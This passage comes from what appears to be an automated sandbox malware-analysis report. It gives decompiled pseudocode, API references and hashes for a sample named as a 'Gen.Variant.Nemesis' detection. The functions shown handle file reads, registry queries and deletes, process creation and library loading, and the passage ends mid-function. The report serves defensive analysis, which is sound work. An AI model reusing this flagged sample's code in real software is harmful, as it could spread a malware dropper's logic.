				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061DB( *0x40a01c, 0x414ef0, _t28) == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x00403375
0x0040337e
0x00403387
0x0040338b
0x00403396
0x00403396
0x0040339e
0x004033a5
0x004033b7
0x004033be
0x00403463
0x00403463
0x00000000
0x004033c4
0x004033c7
0x004033d3
0x004033d7
0x00403471
0x00403471
0x004033dd
0x004033e0
0x0040343f
0x00403445
0x00403447
0x00403447
0x00403459
0x00403461
0x00403468
0x0040346b
0x00000000
0x00000000
0x00000000
0x00000000
0x004033e2
0x004033e5
0x00000000
0x004033eb
0x004033f0
0x004033f7
0x004033fa
0x004033fc
0x004033fc
0x00403409
0x00403413
0x00000000
0x00000000
0x0040341c
0x00403423
0x0040343b
0x00403465
0x00403465
0x00403425
0x00403425
0x00403428
0x0040342b
0x00403431
0x00403437
0x00000000
0x00403439
0x00000000
0x00403439
0x00403437
0x00000000
0x00403423
0x00000000
0x004033f0
0x004033e5
0x004033e0
0x004033d7
0x004033be
0x00403473
0x00403476

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E004065AF(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
				return 0;
			}

0x0040252a
0x0040252a
0x0040252f
0x00402536
0x00402538
0x0040253f
0x00402542
0x0040292e
0x00402548
0x0040254b
0x00402566
0x00402596
0x00402596
0x00402599
0x00402568
0x0040256c
0x00402585
0x0040258c
0x0040258f
0x0040256e
0x00402571
0x0040257c
0x004025f5
0x00000000
0x00000000
0x00000000
0x00402571
0x0040256c
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse53CA.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: fe5d7100633d4aebe701fe4e2ff17594fa17b57cc0077f8e4dddba4eb7828dca
Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
Opcode Fuzzy Hash: fe5d7100633d4aebe701fe4e2ff17594fa17b57cc0077f8e4dddba4eb7828dca
Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402434(void* __ebx) {
				long _t7;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t22 = E00402DE6(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402434
0x00402434
0x00402437
0x0040243a
0x00402476
0x0040247b
0x00000000
0x0040243c
0x00402443
0x00402447
0x0040292e
0x0040292e
0x0040244d
0x0040245d
0x0040245f
0x0040247d
0x0040247f
0x00000000
0x00402485
0x0040247f
0x00402447
0x00402c2d
0x00402c39

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
RegCloseKey.ADVAPI32(00000000), ref: 0040245F

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 65ff1f8dbaffb273fea002e1581b0fe02a96c3d403949f6d37ec42173edc1899
Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
Opcode Fuzzy Hash: 65ff1f8dbaffb273fea002e1581b0fe02a96c3d403949f6d37ec42173edc1899
Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
Opcode Fuzzy Hash: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405c54
0x00405c74
0x00405c7c
0x00405c81
0x00000000
0x00405c87
0x00405c8b

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
CloseHandle.KERNEL32(?), ref: 00405C81

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406a3d
0x00406a40
0x00406a47
0x00406a4f
0x00406a5b
0x00000000
0x00406a62
0x00406a52
0x00406a59
0x00000000
0x00406a6a
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79

Uniqueness

Uniqueness Score: -1.00%

Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x0040615c
0x00406169
0x0040617e
0x00406184

APIs

GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 0040615C
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x00406138
0x0040613e
0x00406143
0x0040614c
0x0040614c
0x00406155

APIs

GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405c1c
0x00405c24
0x00000000
0x00405c2a
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
GetLastError.KERNEL32 ref: 00405C2A

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D

Uniqueness

Uniqueness Score: -1.00%

Function 74252B98 Relevance: 1.6, APIs: 1, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E74252B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x74255050 != 0 && E74252ADB(_a4) == 0) {
					 *0x74255054 = _t93;
					if( *0x7425504c != 0) {
						_t93 =  *0x7425504c;
					} else {
						E742530C0(E74252AD5(), __ecx);
						 *0x7425504c = _t93;
					}
				}
				_t28 = E74252B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E74252AFD();
					_t72 = _a4;
					_t79 =  *0x74255058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x74255058 = _t72;
					E74252AF7();
					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x74255034 = _t33;
					 *0x74255038 = _t79;
					if( *0x74255050 != 0 && E74252ADB( *0x74255058) == 0) {
						 *0x7425504c = _t94;
						_t94 =  *0x74255054;
					}
					_t80 =  *0x74255058;
					_a4 = _t80;
					 *0x74255058 =  *((intOrPtr*)(E74252AFD() + _t80));
					_t37 = E74252AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E74252B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E74252B14() + _a4 + _v8);
							_push(E74252B1E());
							if( *0x74255050 <= 0 || E74252ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x7425504c =  *0x7425504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x74255058;
					if( *0x74255058 == 0) {
						 *0x7425504c = 0;
					}
